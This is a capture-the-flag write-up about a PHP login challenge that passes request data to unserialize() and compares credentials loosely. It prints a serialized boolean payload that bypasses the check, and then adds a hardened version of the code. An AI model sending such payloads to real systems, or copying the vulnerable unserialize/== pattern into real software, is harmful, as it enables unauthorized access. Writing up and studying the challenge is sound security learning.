Source code:
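<?php
show_source(__FILE__);
$username = "admin";
$password = "password";
// flag.php defines $flag (and may overwrite the variables above)
include("flag.php");
$data = isset($_POST['data']) ? $_POST['data'] : "";
// User-controlled input is passed straight to unserialize()
$data_unserialize = unserialize($data);
// Loose (==) comparison against the expected credentials
if ($data_unserialize['username'] == $username && $data_unserialize['password'] == $password) {
    echo $flag;
} else {
    echo "username or password error!";
}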
At first I tried serializing an array with the username admin and the password password:
data=a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}
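This worked when run locally, but the exploit did not work against the online target.
Later, looking at the source more carefully, I found that include("flag.php"); presumably changes the value of username or password, which causes this.
Looking at the source again, I found that the comparison is a weakly typed (loose) comparison. We only need to change the values in the serialized array to True, and the condition is always satisfied no matter how username and password change.
Finally, construct the exploit: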
data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
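The loose check from the source above next to a hardened version, as an added example that is not part of the original write-up. The function names loose_check and strict_check and the two credential values are hypothetical stand-ins, since the values set by flag.php are not shown on the page.

```php
<?php
declare(strict_types=1);

// Constructed stand-ins for whatever flag.php assigns (assumption).
$username = "changed-by-flag.php";
$password = "also-changed";

// Same logic as the challenge: unserialize() lets the sender choose the
// type of each value, and == compares a bool by casting the other side
// to bool, so b:1 equals any string except "" and "0".
function loose_check(string $data, string $username, string $password): bool
{
    $d = unserialize($data, ['allowed_classes' => false]);
    return is_array($d)
        && ($d['username'] ?? null) == $username
        && ($d['password'] ?? null) == $password;
}

// Hardened: JSON instead of unserialize(), explicit string type checks,
// and hash_equals() for a type-strict, constant-time comparison.
function strict_check(string $data, string $username, string $password): bool
{
    $d = json_decode($data, true);
    if (!is_array($d)) {
        return false;
    }
    $u = $d['username'] ?? null;
    $p = $d['password'] ?? null;
    if (!is_string($u) || !is_string($p)) {
        return false;
    }
    $userOk = hash_equals($username, $u);
    $passOk = hash_equals($password, $p);
    return $userOk && $passOk;
}

// Payloads from the write-up, then the same idea sent as JSON.
$boolPayload = 'a:2:{s:8:"username";b:1;s:8:"password";b:1;}';
$strPayload  = 'a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}';
$jsonBool    = '{"username":true,"password":true}';
$jsonGood    = json_encode(['username' => $username, 'password' => $password]);

var_dump(loose_check($boolPayload, $username, $password));
var_dump(loose_check($strPayload, $username, $password));
var_dump(strict_check($jsonBool, $username, $password));
var_dump(strict_check($jsonGood, $username, $password));
```

Replacing == with === alone would also reject the boolean payload; dropping unserialize() on request data additionally removes the object-injection surface.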